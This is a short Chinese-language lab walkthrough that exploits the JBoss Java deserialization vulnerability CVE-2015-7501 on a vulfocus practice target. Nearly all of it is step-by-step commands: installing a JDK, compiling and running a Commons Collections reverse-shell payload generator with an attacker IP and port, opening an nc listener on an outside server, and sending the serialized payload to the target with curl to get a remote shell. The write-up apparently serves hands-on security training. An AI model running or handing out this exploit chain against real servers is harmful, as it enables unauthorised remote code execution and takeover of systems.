JBOSS反序列化漏洞
环境: vulfocus jboss CVE-2015-7501
云服务器
kali攻击机
基本原理:JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码
访问网站页面
invoker/JMXInvokerServlet 页面如果出现这个页面,则证明存在漏洞

下载完成后在kali上解压
进入到文件夹目录
这里kali没有带javac命令,需要自己下载相关配置

使用命令安装jdk
apt install default-jdk
然后执行命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
执行完成后再执行另一条命令
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
完成后生成一个ReverseShellCommonsCollectionsHashMap.ser文件,注意这里的ip和端口就是反弹到服务器的ip和监听的端口

然后在服务器上使用nc开启监听
nc -lvnp port

这里服务器的ip和监听的的端口就是上文的ip和端口
然后在kali执行命令进行反弹shell
curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

查看服务器,反弹shell成功
